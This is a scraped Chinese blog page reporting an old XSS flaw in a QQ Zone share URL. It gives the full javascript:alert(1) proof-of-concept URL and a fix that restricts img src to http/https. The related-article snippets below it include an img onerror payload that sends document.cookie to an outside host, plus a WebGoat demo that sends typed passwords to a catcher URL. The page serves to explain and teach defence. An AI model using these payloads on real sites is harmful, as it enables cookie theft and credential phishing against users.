XSS漏洞： new Image().src = 'javascript:alert(1)';

最新推荐文章于 2023-11-30 13:37:37 发布

原创最新推荐文章于 2023-11-30 13:37:37 发布 · 1k 阅读

0 ·

CC 4.0 BY-SA版权

javascript 专栏收录该内容

5 篇文章

订阅专栏

本文分析了QQ空间中的一项XSS漏洞，该漏洞利用图片源码注入恶意脚本，在特定浏览器环境下触发警告弹窗。文章详细解释了漏洞产生的原因，并提供了解决方案。

百度空间改得都不知怎么用了，把一些以前的文章重新发过来

今天又发现了一个XSS，*_*, 给大家发下，引以为戒：

链接：

http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://www.80vul.com&title=22222&summary=333&pics=javascript:alert(1)&url=52

原因在于页面代码里有一段

var img = new Image();

img.src = getParamter('pics');

相当于 new Image().src = 'javascript:alert(1)';

这里就被XSS了；只在IE6下可以执行效。

解决方法：

限制img标签的src属性始终以http://或https://开头

大家可以参考

http://ha.ckers.org/xss.html

里面还有各种BACKGROUND等相类似的XSS

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

j10a

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

XSS漏洞：prompt.mi靶场通关

qq_68163788的博客

01-17

2176

prompt.mi靶场是一个专门设计用来测试和学习跨站脚本漏洞（XSS）的在线平台。在这个靶场中，你可以通过输入恶意代码来尝试利用网站的XSS漏洞，从而获取敏感信息或执行恶意操作。通关这个靶场意味着成功利用了网站的XSS漏洞，并能够展示出如何防止这种漏洞的攻击。这个靶场对于安全研究人员和开发人员来说是一个非常有用的学习和测试工具，可以帮助他们更好地理解和防范XSS漏洞。通过这个平台，用户可以提高对XSS漏洞的认识，并学习如何更好地保护自己的网站免受此类攻击。

在线xss漏洞通关https://xss.haozi.me/（1-18）

weixin_67832625的博客

07-25

1325

xss-labs(1-18)全代码教程，黑客小游戏，附加网页地址和通关照片，通过手动闭合，注释，xss注入来通关完成，go，go，go！！！！！！

参与评论您还未登录，请先登录后发表或查看评论

javascript:alert(1)//

weixin_34344677的博客

07-19

1423

javascript:alert(1)// 转载于:https://blog.51cto.com/qwerttu/1676040

一段有趣的Javascript代码及分析

iteye_1858的博客

03-08

400

在2011年的BlackHat DC 2011大会上Ryan Barnett给出了一段关于XSS的示例javascript代码： [code="javascript"] ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_) [/cod...

【漏洞扫描器】AWVS扫描器简单分析

soldi_er的博客

02-23

4415

文章目录0x01 前言0x02 抓包 0x01 前言 0x02 抓包第一个请求包 GET / HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chr

JavaScript弹出对话框的三种方式-alert()-confirm()-prompt()

weixin_45819980的博客

12-14

7706

一、alert()警告框（确定） alert()方法是显示一条弹出提示消息和确认按钮的警告框。需要注意的是： alert()是一个阻塞的函数，如果不点确认按钮，后面的内容就不会加载出来。使用方式： alert(“想要提示的文本内容”) 点击确定按钮之后实现代码： <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewpor

JavaScript中的alert

illikang的博客

08-20

3113

window.alert()会使JavaScript代码进入停滞状态。也就是说在弹出alter提示消息以后到点击确认以前，JS代码是停止执行的。这段期间窗口中发生的所有事件都不会被捕捉到。...

</code><img src=x onerror=var img = new Image();img.src="http://zhijiujiu.cn/xss/receive.php?x=" + document.cookie;document.body.append(img);>

最新发布

08-27

我们被要求展示一个利用XSS漏洞进行攻击的代码片段，具体是使用img标签的onerror属性注入窃取cookie的JavaScript脚本。根据引用[1]中提到的示例，我们可以构造一个类似的恶意代码片段。同时，我们还需要注意，在...

XSS漏洞讲解与多篇实战讲解

浪子燕青的博客

02-25

3740

跨站脚本攻击 XSS攻击基础概述个人对XSS攻击的原理认知：原理：对可以控制传参的位置，比如url链接中，输入框中，首先闭合输出参数位置前后网页标签，在闭合的中间加上JavaScript代码或者其他的html标签，使得网页能够执行你添加的参数功能。危害：凡是js能做的，大部分xss漏洞都能利用，常见的比如获取当前cookie，获取浏览器保存的账号密码、获取屏幕截图，获取页面的数据，改变页面的逻辑，向服务器发送数据请求等。情景：在挖洞的情景下，只要保证能弹个窗，或者执行js代码即可。但是

渗透测试基础-XSS漏洞简析

学习、分享、交流

05-17

7027

XSS原理：我们在一个网站上，输入【前端代码】，如果这个网站将我们的前端代码执行了，那么就说明这儿存在XSS漏洞。

javascriptalert怎么处理,javascript中alert写法

阿发狗伪原创

11-30

574

alert是HTML DOM 中用到的一种脚本语言，它的中文意思是"提醒"。其主要用法就是在你自己定义了一定的函数以后，通过执行相应的操作，所弹出对话框的语言。alert 方法有一个参数，就是用户想弹出的内容，弹出框很简单，就一个显示功能。如果你输入的是：123456 点击确定之后kouling 的值为：123456。内容很简单，就这么一点东西，还是一句话，只有最合适的技术，没有最好的技术。3、prompt() 这个弹出框相对于上面两个弹出框来说，智能化又高了，你可以直接在这个弹出框里面回复。

new Image().src资源重复请求问题

weixin_30783913的博客

04-26

1102

const img = new Image(); img.setAttribute("crossOrigin", 'Anonymous'); img.src = url + '?t=' + new Date().getTime(); imgBg.onload = function() {} 请求路径后面增加new Date().getTime()，防止浏览器重复请求相同资源转载于...

image xss 1.图片发生xss攻击的条件、原因及对策

microad_liy的专栏

08-30

8960

发生image xss的条件・ IE6、IE7 ・图片的magic bite和content_type不一致 (解释①图片magic bite) 发生image xss的原因 Ie在进行content种别判断时，不单考虑content_type,还

【JavaScript】alert的使用方法 | 超详细

热门推荐

2301_78131481的博客

11-26

2万+

alert（）方法用于显示带有一条指定消息和一个确认的按钮的警告框。

image xss 3.ruby防止图片xss攻击的方法

microad_liy的专栏

08-31

1697

1、Rmagick插件中允许的content_type类型 \vendor\plugins\attachment_fu\lib\technoweenie\attachment_fu.rb 5~35行 image/jpeg | image/pjpeg | image/jpg

浅析图片XSS中的哪些技术问题

weixin_33766805的博客

09-25

1020

本文讲的是浅析图片XSS中的哪些技术问题，跨站请求漏洞是web漏洞中最普遍的漏洞，在特定的场景下可以造成很严重的破坏。可以让攻击者在受害者浏览器上执行一个恶意脚本，网络上关于这方面的文章已经很多了。危害想象下，如果我们能够在图片里直接插入JS脚本，并且在访问图片的时候能够触发这个脚本。那么我们就可以在网站文章下面的留言中上传图片，让用户不知不觉中招...

Bootstrap 小实验，img标签，显示不出来图片。已解决！

自强不息，厚德载物，未来可期

03-17

6006

在做这个bootstrap小实验的时候，碰到一个问题，就是插入到的img标签，无法显示图片，关于src的引入，我查阅了相关的资料，在这里总结下： src引入图片路径两种主要的方式：绝对路径相对路径比如在我这次实验的工程里面，我在写入相对路径的时候，很明显是没有问题的哦，但是图片显示不出来. 从图中可以看出，相对路径是 src="../build/Template/assets/i...

【渗透测试】【漏洞记录】某平台触发img-src存储型XSS

preserphy的博客

12-19

2737

这是某个管理平台，不知道是平台的问题还是二次开发的问题，授权测试过程中发现了这个漏洞，很常见，但由于本人是第一次采取这种利用方式，所以记录一下。 =============================================================== 利用背景：发现了XSS，并且在删除处可以进行触发img标签及src属性，但是常见的获取cookie、弹窗等等测试用的关键词...

Web安全XSS

08-19

349

简单的反射型XSS钓鱼演示 form> script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password="